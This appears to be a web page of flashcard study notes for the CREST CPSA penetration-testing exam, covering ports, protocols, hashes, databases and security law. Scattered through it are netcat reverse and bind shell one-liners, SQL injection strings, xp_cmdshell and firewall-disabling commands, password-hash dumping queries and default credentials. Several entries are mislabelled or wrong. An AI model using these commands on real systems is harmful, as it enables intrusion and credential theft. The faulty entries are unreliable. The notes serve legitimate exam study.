CREST CPSA EXAM 3000 QUESTIONS AND CORRECT ANSWERS LATEST 2023-2024(VERIFIED ANSWERS)

Leave a Comment / By

Crest cpsa exam practice test
crest cpsa exam cost
crest cpsa exam questions and answers
crest cpsa exam dump
Crest cpsa exam questions
crest cpsa pass mark
crest cpsa course
crest cpsa exam github

TCP
Transmission Control Protocol

UDP
User Datagram Protocol

Port 21
FTP

FTP
File Transfer Protocol

Port 22
SSH

SSH
Secure Shell

Port 23
Telnet

Port 25
SMTP

SMTP
Simple Mail Transfer Protocol

Port 49
TACACS

TACACS
Terminal Access Controller Access Control System

Port 53
DNS

DNS
Domain Name System

Port 67 (UDP)
DHCP (Server)

Port 68 (UDP)
DHCP (Client)

DHCP
Dynamic Host Configuration Protocol

Port 69 (UDP)
TFTP

TFTP
Trivial File Transfer Protocol

Port 80
HTTP

HTTP
Hypertext Transfer Protocol

Port 88
Kerberos

Kerberos
A computer network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner

Port 110
POP3

POP3
Post Office Protocol version 3

Port 111
RPC

RPC
Remote Procedure Call

Port 123
NTP

NTP
Network Time Protocol

Port 135
Windows RPC (EPM)

Port 593
RPC over HTTPS

Port 445
SMB

SMB
Server Message Block

Port 137 (UDP)
NetBIOS (name services)

Port 138 (UDP)
NetBIOS (datagram services)

Port 139
NetBIOS (session services)

NetBIOS
Network Basic Input/Output System

Port 143
IMAP

IMAP
Internet Message Access Protocol

Port 161 (UDP)
SNMP

SNMP
Simple Network Management Protocol

Port 179
BGP

BGP
Border Gateway Protocol

Border Gateway Protocol (BGP)
A standardized exterior gateway protocol designed to exchange routing and reach-ability information among autonomous systems on the Internet. The protocol is classified as a path vector protocol.

Port 201
AppleTalk

Port 389
LDAP

LDAP
Lightweight Directory Access Protocol

Port 443
HTTPS

Port 500 (UDP)
Internet Key Exchange (IKE) (used with IPSec)

ISAKMP

ISAKMP
Internet Security Association and Key Management Protocol

Port 514 (UDP)
Syslog

Port 520
RIP

RIP
Routing Information Protocol

Port 546
DHCPv6 (client)

Port 567
DHCPv6 (servers)

Port 587
SMTP

Port 902
VMWare

Port 1080
Socks Proxy

Port 636
LDAPS

Port 1194
VPN

Port 1433
MS-SQL

Port 1434
MS-SQL (monitoring)

Port 1521
Oracle

Port 1629
DameWare

Port 2049
NFS

NFS
Network File System

Port 3128
Squid Proxy

Port 3306
MySQL

Port 3389
RDP (Remote Desktop Protocol)

Port 5060
SIP

SIP
Session Initiation Protocol

Port 5222
Jabber

Port 5432
Postgres

Port 5666
Nagios

Postgres
An object-relational database management system with an emphasis on extensibility and standards compliance

Nagios
Open source system monitoring service

Port 5900
VNC

VNC
Virtual Network Computing

Port 6000
X11

X11
A windowing system for bitmap displays, common on Unix-like operating systems. Provides the basic framework for a GUI environment: drawing and moving windows on the display device and interacting with a mouse and keyboard.

Port 6129
DameWare

DameWare
Remote Access Software on port 6129

Port 6667
IRC (Internet Relay Chat)

Port 9001
Tor

Port 9001
HSQL

Port 9090
Openfire

Port 9100
Jet Direct

Yersinia
Layer 2 testing tool (STP, CDP, VLAN Trunking, etc)

STP
Spanning Tree Protocol

CDP
Cisco Discovery Protocol

DTP
Dynamic Trunking Protocol

HSRP
Hot Standby Router Protocol

VTP
VLAN Trunking Protocol

fgdump
A utility for dumping passwords on Windows NT/2000/XP/2003 machines

Reserved Internal IPs
10.0.0.0/8 (10.0.0.0-10.255.255.255) : Private

127.0.0.0/8 (127.0.0.0-127.255.255.255) : Local Host Loopback

172.16.0.0/12 (172.16.0.0-172.31.255.255) : Private

192.168.0.0/16 (192.168.0.0-192.168.255.255) : Private

Symmetric Encryption
DES/3DES
AES
Twofish
Blowfish
Serpent
IDEA
RC4, RC5, RC6
CAST

Asymmetric Encryption
RSA
El Gamal
ECC Eliptic Curve
Diffie-Helman (Key Exchange)
Paillier
Merkle-Helman
Cramer-Shoup

Hashes
MD5
SHA1
MySQL < 4.1
MySQL5
MD5 (WP)
MD5 (phpBB3)
LM / NTLM

Oracle Default Credentials
–Username | Password–
SYSTEM | MANAGER
ANONYMOUS | ANONYMOUS
SCOTT | TIGER
OLAPSYS | MANAGER
SYS | CHANGE_ON_INSTALL

Port 512
rexec (username / password)

Port 513
rlogin (telnet)

Port 514
rsh

Port 514
rcp

LM Hash
Primary Windows LAN hash before Windows NT. 14 character limit.

DES
56 bit key encryption (16 cycles of 48 bit subkeys)

3DES
168 bit key encryption (48 cycles)

TTL for Windows
128

TTL for Linux
64

TTL for Networking Devices / Solaris
255

Cisco Password Encryption
secret 4 : Crappy SHA256
secret 5 : Salted MD5
secret 7: Crappy Cisco encryption to prevent cleartext in the config
secret 8 : PBKDF2 (Password-Based Key Derivation Function 2) bruteforce target
secret 9 : scrypt (BINGO)

SIP Requests
INVITE
ACK
BYE
CANCEL
OPTIONS
REGISTER
PRACK
SUBSCRIBE
NOTIFY
PUBLISH
INFO
REFER
MESSAGE
UPDATE

SMTP Requests
MAIL
RCPT
DATA

SNMP Requests
Get
GetNext
Set
GetBulk
Response
Trap
Inform

HTTP Status Codes
1xx – Info
2xx – Success
3xx – Redirection
4xx – Error
5xx – Server Error

HTTP Status Code 404
NOT FOUND the method is not available

HTTP Status Code 301
Moved Permanently

HTTP Status Code 302
Temporarily Moved

HTTP Status Code 410
Gone

SQL Injections (Escape Characters)
‘ OR ‘1’ = ‘1’ —
‘ OR ‘1’ = ‘1’ {
‘ OR ‘1’ = ‘1’ /*

SQL Injections (Type Handling)
1;DROPTABLE users

Linux File Permissions
drwxrwxrwx 2 user(owner) group size date filename

d | rwx | rwx | rwx
Filetype | User | Group | Everyone

Linux Command : Change Password
passwd

Linux Command : Find Files of Type
find . -type f -iname ‘.pdf’ locate ‘.pdf’

Linux File System Structure
/bin – User Binaries
/boot – Bootup related files
/dev – Interface for system devices
/etc – System Config Files
/home – Base directory for user files
/lib – Critical software libraries
/opt – Third party software
/proc – System and running processes
/root – Home for root
/sbin – Sys Admin binaries
/tmp – Temporary Files
/usr – Less critical files
/var – Variable system files

IPTables
A user-space utility program that allows a system administrator to configure the tables provided by the Linux kernel firewall and the chains and rules it stores

Wireshark and TCPdump
Common packet analyzers. Allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached

pfSense
Open source firewall/router computer software distribution based on FreeBSD

Solaris Command : Process Listing
prstat -a

Solaris Command : Services and Status
svcs -a

Solaris Command: Start Service (Admin)
svcadm start

NT 3.1 Versions
Windows NT 3.1 (All)

NT 3.5 Versions
Windows NT 3.5 (All)

NT 3.51 Versions
Windows NT 3.51 (All)

NT 4.0 Versions
Windows NT 4.0 (All)

NT 5.0 Versions
Windows 2000 (All)

NT 5.1 Versions
Windows XP (Home, pro, MC, Tablet, PC, Starter, Embedded)

NT 5.2 Versions
Windows XP (64 bit, Pro 64 bit)
Windows Server 2003 and R2
Windows Home Server

NT 6.0 Versions
Windows Vista (All)
Windows Server 2008 (Foundation, Standard, Enterprise)

NT 6.1 Versions
Windows 7 (All)
Windows Server 2008 R2 (All)

NT 6.2 Versions
Windows 8
Windows Phone 8
Windows Server 2012

%SYSTEMDRIVE%\boot.ini
Contains the boot options for computers with BIOS firmware running NT-based operating system prior to Windows Vista

%SYSTEMROOT%\repair\SAM

%SYSTEMROOT%\System32\config\RegBack\SAM
Stores Windows users’ passwords in a hashed format (in LM hash and NTLM hash). These are backups of C:\windows\system32\config\SAM

Windows Commands : System Info
ver : OS Version
sc query state=all : Services
tasklist /svc : Processes and Services
echo %USERNAME% : Current user

Windows Command : Find Files of Type
dir /a /s /n c:.pdf

Windows Commands : Add User, Make Admin
net user /add
net localgroup “Administrators” /add

Linux Command : Add User, Make Sudoer
useradd (adduser )
passwd
sudo useradd sudo (sudo adduser sudo)

Command : View Network Info
Linux: ifconfig
Windows: ipconfig /all

Command : Display File Contents
Linux: cat
Windows: cat

nslookup
A network administration command-line tool for querying the Domain Name System (DNS) to obtain domain name or IP address mapping or for any other specific DNS record.

IIS 1 Defaults
Windows NT Addon

IIS 2 Defaults
NT 4.0

IIS 3 Defaults
NT 4 Service Pack

IIS 4 Defaults
NT4 Option Pack

IIS 5 Defaults
Windows 2000

IIS 5.1 Defaults
Windows XP

IIS 6 Defaults
Windows Server 2003, Windows XP Pro

IIS 7 Defaults
Windows Vista, Server 2008

IIS 7.5 Defaults
Windows 7, 2008 R2

IIS 8 Defaults
Windows Server 2012, Windows 8

IIS 8.5 Defaults
Windows Server 2012 R2, Windows 8.1

IIS 10 v 1607 Defaults
Windows Server 2016, Windows 10 Anniversary Update

IIS 10 v 1709 Defaults
Windows 10 Fall Creators, v1709

IIS 10 v 1809 Defaults
Windows Server 2019, Windows 10 October Update

Windows Command : Disable Firewall
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off

Sysinternals Suite
A set of powerful Windows administration applications used to view, troubleshoot, and modify Windows functions

WMCI
Windows Management Instrumentation Command-Line

WMCI Command : Execute Process
wmci process call create “process_name”

WMCI Command : Uninstall Software
wmci product get name /value
wmci product where name=”XX” call uninstall /nointeractive

PCI Card Info Storage Common-Use

  • Store card details (i.e CC number, expiry) in encrypted form
  • Store cardholder details (name, address, contact details…ie PII) in a SEPARATE encrypted database with a unique reference identifier linking the two
    -DO NOT STORE sensitive data (ie CVV2, CVV or CID values)

Windows : Active Directory Default Location
C:\Windows\NTDS

Ntds.dit is the physical storage file

Windows : Domain Common Folders
C:\Windows\SYSVOL

Contains Group Policies, Login Scripts, Staging Folders, etc.

dsquery
Remote Server Administration Tools (RSAT) feature pack tool used to enumerate Windows Domain

Classful IP Range : Class A
128 Networks (2^7), 16,777,216 Addresses per network (2^24)

Range : 0.0.0.0-127.0.0.0
Default Subnet Mask : 255.0.0.0
CIDR Notation : /8

Classful IP Range : Class B
16,384 Networks (2^14), 65,536 Addresses per network (2^16)

Range : 128.0.0.0-191.255.0.0
Default Subnet Mask : 255.255.0.0
CIDR Notation : /16

Classful IP Range : Class C
2,097,152 Networks (2^21), 256 Addresses per network (2^8)

Range : 192.0.0.0-223.255.255.0
Default Subnet Mask : 255.255.255.0
CIDR Notation : /24

Classful IP Range Calculation
If the first bit is a “0”, it’s a class A address (Half the address space has a “0” for the first bit, so this is why class A takes up half the address space.)

If the second bit is a “0”, it’s a class B address (Half of the remaining non-class-A addresses, or one quarter of the total.)

If the third bit is a “0”, it’s a class C address (Half again of what’s left, or one eighth of the total.)

If the fourth bit is a “0”, it’s a class D address. (Half the remainder, or one sixteenth of the address space.) If it’s a “1”, it’s a class E address. (The other half, one sixteenth.)

Classless Subnets / CIDR
Class C – 255.255.255.0 , /24 (254 Hosts)
Class B – 255.255.0.0 , /16 (65,534 Hosts)
Class A – 255.0.0.0 , /8 (16,777,214 Hosts)

CRITICAL SUBNET INFO
RTFM page 36

Hexadecimal Chart
0
1
2
3
4
5
6
7
8
9
10 – A
11 – B
12 – C
13 – D
14 – E
15 – F

VLAN
A switched network that is logically segmented by function, project team, or application, without regard to the physical locations of the users.

VLAN IDs 1002-1005
Token Ring and FDDI VLANs

VLAN IDs greater than 1005
Extended-range VLANs (not stored in the VLAN database)

VLAN IDs 1-1005
Normal-range VLANs

vlan.dat
Configurations for VLAN IDs 1-1005

Netcat : Start Listener to Catch Shell
Linux:
nc 10.0.0.1 1234 -e /bin/sh
Windows:
nc 10.0.0.1 1234 -e cmd.exe

(-e is execute and is not always supported)

Netcat : Listen
nc -nlvp

Netcat : Transfer Text or Binary Files
Listener : nc -nlvp 4444 > incoming.exe

Sender: nc -nv IP to send to 4444 < file

Netcat : Bind Shell
Listener:
nc -nlvp 4444 -e cmd.exe (to set up cmd to run)

Sender/ “Talker”:
nc -nv IP to connect to 4444

(this will execute the cmd.exe and all the “Talker” to connect to the host)
Attacking Listener

Netcat : Reverse Shell
Listener:
nc -nlvp 4444

Sender:
nc -nv IP to send to 4444 /bin/bash

(sends shell!)
Attacking Sender

NMap : Scan Types
-sP : ping scan
-sS : syn scan (“half open” scan)
-sT : connect scan (full TCP)
-sU : UDP scan
-sO : protocol scan

Port Count
65,536 (2^16) Ports

This applies to TCP AND UDP

NMap : Scan EVERY Port
TCP: nmap -p-
UDP: nmap -sU -p-

NMap : Common Options
-p1-65535 : Ports
-T[0-5] : “Scan Speed”, can help hide you
-n : No DNS Resolution
-O : OS Detection
-A : AGGRESSIVE
-sV : Version Detection
-PN : No Ping
-6 : IPv6 Scan
-oA : Output ALL types

NMap : DNS Reverse Lookup
nmap -R -sL -dns-server

Hash Lengths
MD5 : 16 Bytes
SHA-1 : 20 bytes
SHA-256 : 32 Bytes
SHA-512 : 64 Bytes

IIS
Microsoft Web Server

Apache / Tomcat
Apache Web Servers

GWS
Google Web Server

Websphere
IBM Web Server

Litespeed
LiteSpeed Tech Web Server

MS-SQL : DB Version
SELECT @@version

EXEC xp_msver
(detailed version info)

MS-SQL : Run OS Command
EXEC master..xp_cmdshell ‘net user’

MS-SQL : SELECT commands
SELECT HOST_NAME( ) : Hostname and IP

SELECT DB_NAME ( ) : Current DB

SELECT name FROM master..sysdatabases; : List DBs

SELECT user_name ( ) : Current user

SELECT name FROM master..syslogins : List users

SELECT name FROM master..sysobjects WHERE xtype=’U’; : List Tables

SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjections WHERE name=’mytable’); : List columns

MS-SQL : List all Tables and Columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’)

MS-SQL : System Table (Info on All Tables)
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

MS-SQL 2005 Vulnerability (Password Hashes)
SELECT name, password_hash FROM master.sys.sql_logins

Postgres : SELECT commands
SELECT version(); : DB Version

SELECT inet_server)addr(); : Hostname and IP

SELECT current_database(); : Current DB

SELECT datname FROM pg_database; : List DBs

SELECT user; : Current user

SELECT username FROM pg_user; : List Users

SELECT username,passwd FROM pg_shadow : List password hashes

MySQL Default Credentials
root | MYSQL

MySQL : SELECT Commands
SELECT @@version; : DB Version

SELECT @@hostname; : Hostname and IP

SELECT database(); : Current DB

SELECT distinct (db) FROM mysql.db; : List DBs

SELECT user(); : Current user

SELECT user FROM mysql.user; : List Users

SELECT host,user,password FROM mysql.user; : List password hashes

MySQL : List Tables (and Columns)
SHOW TABLES (only works for current database)

SELECT * FROM information_schema.columns (full dump)

Oracle : SELECT Commands
SELECT * FROM v$version; : DB Version
(SELECT version FROM v$instance;)

SELECT instance_name FROM v$instance : Current DB
(SELECT name FROM v$database;)

SELECT DISTINCT owner FROM all_tables; : List DBs

SELECT user FROM dual; : Current User

SELECT username FROM all_users ORDER BY username; : List users

SELECT column_name FROM all_tab_columns; : List Columns

SELECT table_name FROM all_tables; : List Tables

SELECT name, password, astatus FROM sys.user$; : List password hashes

host.equiv (or .rhosts file) Structure
Allow any user to log in from any host:

+

Allow any user from host with a matching local account to log in:

host

Allow any user from host to log in:

host +

Allow user from host to log in as any non-root user:

host user

Allow all users with matching local accounts from host to log in except for baduser:

host -baduser
host

Deny all users from host:

-host

Allow all users with matching local accounts on all hosts in a netgroup:

+@netgroup

Disallow all users on all hosts in a netgroup:

-@netgroup

Allow all users in a netgroup to log in from host as any non-root user:

host +@netgroup

Allow all users with matching local accounts on all hosts in a netgroup except baduser:

+@netgroup -baduser
+@netgroup

Linux Shell Breakouts
python -c ‘import pty;pty.spawn(“/bin/bash”)’

echo os.system(‘/bin/bash’)

/bin/sh -i

Language Vulns : Java (OO)
Log Injection
Deadlock
Language-based Attacks

Language Vulns : C (Function)
Code Injection
Buffer Overflow

Language Vulns : Objective-C (OO)
Code Insertion
Malformation
Race Conditions

Language Vulns : C++ (OO)
Race Conditions

Language Vulns: PHP
Incorrect Element Removal

NIC
Network Interface Card

Network Interface Card (NIC)
An expansion card that enables a computer to connect other computers or to a cable modem to facilitate a high-speed Internet connection.

MAC
Media Access Control

NAT
Network Address Translation

Media Access Control (MAC)
An address for communications on the physical network segment.

Network Address Translation (NAT)
A technique that allows private IP addresses to be used on the public Internet.

OSI Model
“Please Dont Nag Tyrannosaurus, She’ll Probably Attack”

1 : Physical (Bits)
2 : Data Link (Frames)
3 : Network (Packets)
4 : Transport (Segments)
5 : Session (Data)
6 : Presentation (Data)
7 : Application (Data)

TCP/IP Model
“Never Ingest Turian Almonds”

1 : Network Interface
2 : Internet Layer
3 : Transport Layer
4 : Application Layer

IETF
Internet Engineering Task Force

IANA
Internet Assigned Numbers Authority

Wireless Standards
802.11b – 2.4 GHz 11 Mbps
802.11a – 5 GHz, 54 Mbps
802.11g – 2.4 GHz, 54 Mbps
802.11n – 5 GHz, 108 Mpbs
802.15 – Bluetooth 2.4 GHz

Data Link Protocols
1) SLIP (serial line internet protocol)
2) PPP (point-to-point protocol)
3) ARP (address resolution protocol) (resolves IP’s into MAC’s)
4) RARP (reverse address resolution protocol) (MAC’s into IP’s)
5) L2F (layer 2 forwarding)
6) L2TP (layer 2 tunneling protocol)
7) PPTP (point-to-point tunneling protocol)
8) ISDN (integrated services digital network)

ARP
Address Resolution Protocol

IGMP
Internet Group Management Protocol

FQDN
Fully Qualified Domain Name

IOC
Indications of Compromise

POC
Point of Contact

Proof of Concept

SIEM
Security Information and Event Management

MBSA
Microsoft Baseline Security Analyzer

CAT5
type of cable that has the ability to transfer information from one computer to another

Ethernet
a system for connecting a number of computer systems to form a local area network, with protocols to control the passing of information and to avoid simultaneous transmission by two or more systems.

Token Ring
A networking technology developed by IBM in the 1980s. It relies upon direct links between nodes and a ring topology, using tokens to allow nodes to transmit data.

APIPA
Automatic Private Internet Protocol Addressing

MTU
maximum transmission unit – The largest data unit a network (for example, Ethernet or token ring) will accept for transmission.

Unicast
a message that is sent from a single sender to a single recipient

Multicast
a form of transmission in which a message is delivered to a group of hosts

Router Protocol
a protocol used between routers so that they can learn routes to add to their routing tables.

Link State Routing
A routing method that floods routing
information to all routers within a network to build and maintain a more complex network route database.

Distance Vector Routing
Each router passes a copy of its routing table to its adjacent neighbors. The neighbor adds the route to its own table, incrementing the metric to reflect the extra distance to the end network. The distance is given as a hop count; the vector component specifies the address of
the next hop.

Hybrid Routing
Routing protocol that uses the attributes of both distance vector and link state

IGP
Interior Gateway Protocol

Interior Gateway Protocol (IGP)
A routing protocol that operates within an autonomous system, which is a network under a single administrative control. Includes IGRP, EGRP, RIP, OSPF, and EIGRP

EGP
Exterior Gateway Protocol

Exterior Gateway Protocol (EGP)
A routing protocol that operates between autonomous systems, which are networks under different administrative control. Border Gateway Protocol (BGP) is the only one in widespread use today.

IPv6
A new protocol developed to replace IPv4, addressing the issue of IP address exhaustion.

No broadcast, has Anycast instead.
128-bit in Hexidecimal

MAC Address
A Media Access Control address is a hardware address that uniquely identifies each node on a network.

Traditional MAC addresses are 12-digit (6 bytes, or 48 bits) hexadecimal numbers.

Network Architectures
The design of a computer network; includes both physical and logical design.

10BaseT
LAN (Ethernet)
10 Mbps

100BaseT
“Fast Ethernet”
100 Mbps

1000BaseT
Gigabit Ethernet
1 GB

Wireless Network
Any type of computer network that is not connected by cables of any kind.

802.11

Shared Media LAN
LAN that shares total bandwidth with all stations (ex. Token Ring)

Switched Media LAN
LAN with bandwidth shared between sender and receiver (Predicated Paths)

*Hubs are similar, but with NODES

Netcraft
Company that tracks web statistics, used to fingerprint web servers

WHOIS
a public Internet database that contains information about Internet domain names and the people or organizations that registered the domains. It is a source of information that can be used to exploit system vulnerabilities.

Egress filtering
Filtering outbound traffic

Ingress Filtering
Filtering inbound traffic

DNS Record Types
SOA- Start of Auth Record
MX- Mail Exchange
TXT- Text Record
A- Address (IPv4)
AAAA- Address (IPv6)
NS – Name Server
PTR – Pointer Record
HINFO – Description of computer / OS
CNAME – Canonical Name

Start of Authority (SOA) Record
Every zone file must include a _ record to identify the name server that’s primarily responsible for the database segments it manages.

Mail Exchanger (MX) Record
A record used by e-mail servers for determining the host names of servers responsible for handling a domain’s incoming e-mail.

A / AAAA Record
IP Address

Name Server (NS) Record
announces the authoritative name servers for a particular zone who will answer queries for their supported zone

Pointer Record (PTR)
A record that points IP addresses/Canonical to host names. See also Reverse Lookup Zone.

CNAME (Canonical name record)
A type of DNS data record that holds alternative names for a host.

Network Protocols
ARP
DHCP
CDP
HSRP
VRRP
VTP
STP
TACACS

Cisco Discovery Protocol (CDP)
a Cisco proprietary Layer 2 protocol to gather information about neighboring Cisco devices

HSRP (Hot Standby Router Protocol)
This is exclusive to Cisco and allows a default router address to be configured to be used in the event that the primary router fails.

VRRP (Virtual Router Redundancy Protocol)
A standard that assigns a virtual IP address to a group of routers. At first, messages routed to the virtual IP address are handled by the master router. If the master router fails, backup routers stand in line to take over responsibility for the virtual IP address.

VTP (VLAN Trunking Protocol)
Cisco’s protocol for exchanging VLAN information over trunks. Allows one switch on a network to centrally manage all VLANs.

STP (Spanning Tree Protocol)
A Layer 2 protocol that is used for routing and prevents network loops by adopting a dynamic routing method.

WEP
Wired Equivalent Privacy

Wired Equivalent Privacy (WEP)
An IEEE 802.11 security protocol designed to ensure that only authorized parties can view transmitted wireless information. Has significant vulnerabilities and is not considered secure.

WPA
Wireless Protected Access

Wireless Protected Access (WPA)
The 802.11 security method created as a stopgap between WEP and 802.11i.

WPA2 uses AES Encryption

EAP (Extensible Authentication Protocol)
A protocol that enables systems to use hardware-based identifiers, such as fingerprint scanners or smart card readers, for authentication.

EAP
Extensible Authentication Protocol

LEAP
Lightweight Extensible Authentication Protocol

PEAP
Protected Extensible Authentication Protocol

nbtstat
A Windows utility that is used to view and
manage NetBIOS name cache information.

Global Catalog Server
A domain controller that holds a subset of the information in all domain partitions for the entire Active Directory forest.

Master Browser
Present on every subnet. Needed for a routed TCP/IP network

FSMO
Flexible Single Master Operations

Flexible Single Master Operations (FSMO) Roles
Also known as operations master roles, these are servers that provide certain functions that can only be handled by one domain controller at a time.

LANMAN hash
The original hash used to store Windows passwords, known as LM hash, based off the DES algorithm. (Legacy)

NTLM
New Technology LAN Manager

NTLM Hash
Successor to the LM hash. A more advanced hash used to store Windows passwords, based off the RC4 algorithm.

NTLMv2
NTLMv2 was developed in response to attacks against the LM authentication protocol. The LM protocol, as the name implies, was originally used in the old LAN Manager Network operating system in the mid-1980s. It uses the MD5 password hash algorithm.

OSPF (Open Shortest Path First)
A link-state routing protocol used on IP networks.

Static Routing
An type of routing used by a network
administrator to manually specify the mappings in the routing table.

Dynamic Routing
Allows a router to determine the best route between two nodes automatically and then store this information in a routing table.

Port 1
TCP Port Service Multiplexer (TCPMUX)

Port 5
Remote Job Entry (RJE)

Port 7
ECHO or ICMP

Port 18
Message Send Protocol (MSP)

Port 29
MSG ICP

Port 37
time

Port 42
Host Name Server (Nameserv)

Port 43
WHOIS

Port 70
Gopher Services

Port 79
finger

Port 103
X.400 Standard

Port 118
SQL Services

Port 119
NNTP (Network News Transfer Protocol)

Newsgroup

Port 159
SQL Server

Port 190
Gateway Access Control Protocol (GACP)

Port 197
Directory Location Service (DLS)

Port 396
Novell Netware over IP

Port 444
Simple Network Paging Protocol (SNPP)

Port 458
Apple QuickTime

Port 500
IKE Internet Key exchange (TCP/UDP)

Computer Misuse Act 1990
An Act which makes illegal a number of activities such as deliberately planting viruses, hacking, using ICT equipment for fraud.

Human Rights Act 1998
Act of Parliament that incorporated the European Convention on Human Rights into UK law, making it enforceable in UK courts

Data Protection Act 1998
The UK law that tells organisations how they must protect the personal data of real people. (NOW GDPR)

GDPR (General Data Protection Regulation)
New European Union law on data protection and privacy for individuals.

DoS
Denial of Service

DDoS (Distributed Denial of Service)
An attack on a computer or network device in which multiple computers send data and requests to the device in an attempt to overwhelm it so that it cannot perform normal operations.

XSS (Cross Site Scripting)
A type of application attack where the attacker takes advantage of scripting and input validation vulnerabilities in an interactive website to attack legitimate users.

MySQL < 5.1 Authentication Bypass
Bug that allows authentication even when password provided is incorrect.

1/256 chance of being triggered, so one can just keep sending login attempts over and over to access.

*Can only be exploited if built on a system where the memcmp() function can return values outside the -128 to 127 range

Passive OS fingerprinting
Observing host behavior and packets (DHCP, TCP, etc) to determine OS

Common Tools: Network Miner, p0f, Satori, Wireshark

Active OS Fingerprinting
Sends specially crafted packets to the remote OS and analyzes the received response.

NMap is awesome at this

AES (Advanced Encryption Standard)
A block cypher created in the late 1990s that uses a 128-bit block size and a 128-, 129-, or 256-bit key size.

TKIP (Temporal Key Integrity Protocol)
A security protocol created by the IEEE 802.11i task group to replace WEP.

SMTP User Enumeration
EXPN
VRFY

Sendmail < 8.12.9 Buffer Overflow
The prescan function in Sendmail 8.12.9 allows remote attackers to execute arbitrary code via buffer overflow attacks, as demonstrated using the parseaddr function in parseaddr.c.

X11
Runs on TCP Port 6000
(can range between 6000-6063)

Can be intercepted if not tunneled through SSH

RPC (Remote Procedure Call) Enumeration
Can be assessed using portmapper requests

Query RPC portmapper using rpcinfo: rpcinfo p

Non-Persistent XSS
XSS that occurs when the attacker’s script that is injected is not stored in the backend, and the Web-browser client simply echoes back the results of the script execution. It can be over GET (QueryString) or POST (Forms) methods.

Can be used to steal cookies, redirect to phishing sites, and force actions if targets click on crafted links

Persistent XSS
malicious code that remains on a website (for ex) until it is removed

Good for getting ahold of forms, tickets, submissions, etc

SOAP
Simple Object Access Protocol

Simple Object Access Protocol (SOAP)
An XML-based communication protocol used for sending messages between applications via the Internet.

XML injection
An attack that injects XML tags and data into a database. Can change data, effect how data is processed, etc.

XXE (XML External Entity) Attack
This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts

Web Server Common Flaws
Denial of Service (DoS)
Buffer overflow attacks
Attacks on vulnerable scripts
URL manipulation

HTTP Web Methods
*Risky Methods are marked with a star

GET
HEAD (similar to GET)
POST
PUT*
DELETE*
CONNECT*
OPTIONS
TRACE*
PATCH

LDAP Injection
An attack that allows for the construction of LDAP statements based on user input statements, which can then be used to access the LDAP database or modify the database’s information

Base64 Encoding
An encoding scheme which represents any binary data using only printable ASCII characters. Usually used for encoding email attachments over SMTP

OSSTMM
Open Source Security Testing Methodology Manual

ISECOM
Institute for Security and Open Methodologies

OWASP
Open Web Application Security Project

PTES
Pen Testing Execution Standard

CPNI
Centre for the Protection of National Infrastructure (UK best practices)

Police and Justice Act 2006
Defines police limitations of searching tech

Computer Fraud and Abuse Act of 1986
This act defines cybercrime as any illegal act for which knowledge of computer technology is essential for its perpetration, investigation, or prosecution; currently being evaluated for revision because much of its language was developed before the Internet boom

HIPAA
Health Insurance Portability and Accountability Act

FISMA
Federal Information Security Management Act

GLBA
Gramm-Leach-Bliley Act

Gramm-Leach-Bliley Act of 1999
requires financial institutions to ensure the security and confidentiality of customer data

GDPR
General Data Protection Regulation

FERPA
Family Educational Rights and Privacy Act

PCI DSS
Payment Card Industry Data Security Standard

Basel Accord
an agreement that required that banks hold as capital at least 8% of their risk-weighted assets

ISO 27000 Series
this series contains a range of individual standards and documents specifically reserved by ISO for information security

COBIT
Control Objectives for Information and Related Technology

IPv4
The Internet Protocol version 4 is the dominant protocol for routing traffic on the Internet, specifying “to” and “from” addresses using a dotted decimal such as “122.45.255.0”.

Cat 5
Category 5 wire, a TIA/EIA standard for UTP wiring that can operate at up to 100 Mbps.

TTL
Time to Live

CSMA/CA
Carrier Sense Multiple Access with Collision Avoidance

CDMA
Code Division Multiple Access (GSM competitor)

The ATM PDU is the cell
OSI physical layer PDU is the bit
OSI data link layer PDU is the frame
OSI network layer PDU is the packet
OSI transport layer PDU is the segment
PDUs between OSI session and application layers are referred to simply as the data
OSI Model PDU

1.3.6.1.2.1.25.1.6.0
System Processes
1.3.6.1.2.1.25.4.2.1.2
Running Programs
1.3.6.1.2.1.25.4.2.1.4
Processes Path
1.3.6.1.2.1.25.2.3.1.4
Storage Units
1.3.6.1.2.1.25.6.3.1.2
Software Name
1.3.6.1.2.1.77.1.2.25
User Accounts
1.3.6.1.2.1.6.13.1.3
TCP Local Ports
Microsoft SNMP

TCP Port 1
Multiplexer tcpmux

TCP Port 7
Echo

TCP Port 11
System status. syst at

TCP 13
Date and time.

TCP 15
netstat

TCP 19
chargen

TCP 21
ftp

TCP 22
ssh

TCP 23
Telnet

TCP 25
smtp

TCP 37
Time

TCP 42
wins

TCP 43
whois

TCP 49
tacacs

TCP 53
DNS

TCP 70
gopher

TCP 79
finger

TCP 80
http

TCP 88
Kerberos

TCP 110
pop3

TCP 113
auth

TCP 119
nntp

TCP 139
Netbios

TCP 143
imap

TCP 179
bgp

TCP 389
LDAP

TCP 443
https

TCP 445
SMB (cifs)

TCP 512
exec (remote)

TCP 513
login (remote )

TCP 514
shell (remote)

TCP 1080
socks proxy

TCP 1433
ms-sql

TCP 1521
TNS Oracle

TCP 1723
pptp

TCP 2433
ms-sql (hidden)

TCP 3128
squid proxy

TCP 3268
Globalcat

TCP 3306
mysql

TCP 3389
RDP

TCP 5432
postgres

TCP 5900
vnc

TCP 6000
X11

TCP 9100
Jetdirect

UDP 53
DNS

UDP 67 and 68
DHCP

UDP 69
ttfp

UDP 123
ntp

UDP 135
RPC

UDP 137 and 138
Netbios

UDP 161
snmp

UDP 445
SMB

UDP 500
IKE

UDP 513
rwho

UDP 520
RIP

UDP 1434
ms-sql / ssrs

UDP 2049
nfs

TKIP
Temporal Key Integrity Protocol

XML
Extensible Markup Language

LSASS
Local Security Authority Subsystem Service

LSA
Local Security Authority

RSA
Rivest, Shamir, & Adleman

CRLF
carriage-return/line-feed

OSPF
Open Shortest Path First

NFS
Network File System

RIP
Routing Information Protocol

IKE
Internet Key Exchange

AES
Advanced Encryption Standard

SQL
Structured Query Language

ISAPI
Internet Server Application Programming Interface

ASP
Active Server Pages

NTP
Network Time Protocol

